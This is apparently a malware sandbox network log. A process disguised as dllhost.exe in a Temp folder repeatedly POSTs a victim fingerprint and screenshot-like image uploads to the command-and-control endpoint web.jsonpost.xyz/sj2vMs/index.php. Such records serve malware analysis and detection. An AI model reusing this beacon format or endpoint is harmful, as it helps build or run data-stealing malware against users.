                                                                                Nov 29, 2024 01:52:36.454981089 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:36.455014944 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:36.455142021 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:36.574765921 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.44978172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:37.376539946 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.44978272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:37.883363008 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:37.883363008 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:37.883435965 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:37.883460045 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:38.003555059 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:38.004096031 CET18540OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:38.017527103 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:38.123980045 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:38.124020100 CET2472OUTData Raw: 1d 09 af 3b db 62 7f e7 e3 ff 00 c0 bf e0 9e c7 d5 70 7f f3 e9 7f e0 3f f0 0f 2f d4 74 eb 8d 32 ed ad ae 17 0c bd 08 e8 c3 d4 55 4a ed bc 51 02 cd e1 9b 2d 4c 5d 4f 32 ce 63 68 c4 c9 18 2a ae a5 bf 84 75 e9 df 15 c4 d7 d1 e0 71 12 af 4a f3 5a a7
                                                                                Data Ascii: ;bp?/t2UJQ-L]O2ch*uqJZcs\$0iu((JZ(QE%QEQELQEQEQEJ(@)(QAQECEPIKI%-%;QEQIK@QEE0(%-(0J(J)))i(-%R)
                                                                                Nov 29, 2024 01:52:38.124106884 CET2472OUTData Raw: 18 1e f5 f1 d4 f2 0a f4 6b cd c5 a7 17 b3 fd 3d 4f b9 8f 11 e1 a7 46 1c e9 a9 75 5f af a7 e2 7a 5d cb 28 8a 72 c4 60 48 b9 cf 6f bb 55 35 d6 56 f0 de a0 54 82 3c 86 e4 7d 2b 93 b8 f1 9c 73 68 b7 10 c1 1c d6 d7 ae 55 91 8b f9 8b 90 57 3c 9e 7a 0a
                                                                                Data Ascii: k=OFu_z](r`HoU5VT<}+shUW<z`~e~e&fN+;8'{WQE|:U\k!u<N1czaFurA]Q]QQCG'T`g|
                                                                                Nov 29, 2024 01:52:38.165654898 CET28428OUTData Raw: 2b 48 ed 10 48 b1 e9 67 ca b1 67 2e 45 cc 4c 3e 66 c7 45 60 e3 70 e9 f2 b0 1f c2 29 c3 1d 8a 93 b5 ba f6 e9 df fa f5 15 4c b3 03 15 74 f6 5d fa db 6f eb d0 db 86 71 31 41 98 e3 77 79 90 24 ac 54 93 14 65 e4 e0 03 f7 40 03 ea 47 be 11 ae 55 22 66
                                                                                Data Ascii: +HHgg.EL>fE`p)Lt]oq1Awy$Te@GU"fI#RXws9L,Y @sg9=}+2wuEsEvhDNy!]'#skqotrg5ey#jeITV.%)e`?N


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.44978372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:38.796008110 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.44978472.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:39.390439034 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:39.390506983 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:39.390568018 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:39.390592098 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:39.510729074 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:39.510785103 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:39.510811090 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:39.510902882 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:39.511018991 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:39.511110067 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:39.630887985 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.44978572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:40.188575983 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.44978672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:40.250339985 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:40.250339985 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:40.250394106 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:40.250420094 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:40.370496035 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:40.370589972 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:40.370667934 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:40.370763063 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:40.370827913 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:40.490715027 CET7416OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:40.490813971 CET9888OUTData Raw: 18 1e f5 f1 d4 f2 0a f4 6b cd c5 a7 17 b3 fd 3d 4f b9 8f 11 e1 a7 46 1c e9 a9 75 5f af a7 e2 7a 5d cb 28 8a 72 c4 60 48 b9 cf 6f bb 55 35 d6 56 f0 de a0 54 82 3c 86 e4 7d 2b 93 b8 f1 9c 73 68 b7 10 c1 1c d6 d7 ae 55 91 8b f9 8b 90 57 3c 9e 7a 0a
                                                                                Data Ascii: k=OFu_z](r`HoU5VT<}+shUW<z`~e~e&fN+;8'{WQE|:U\k!u<N1czaFurA]Q]QQCG'T`g|


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                51192.168.2.44978772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:41.671772003 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                52192.168.2.44978872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:41.782862902 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:41.783000946 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:41.783000946 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
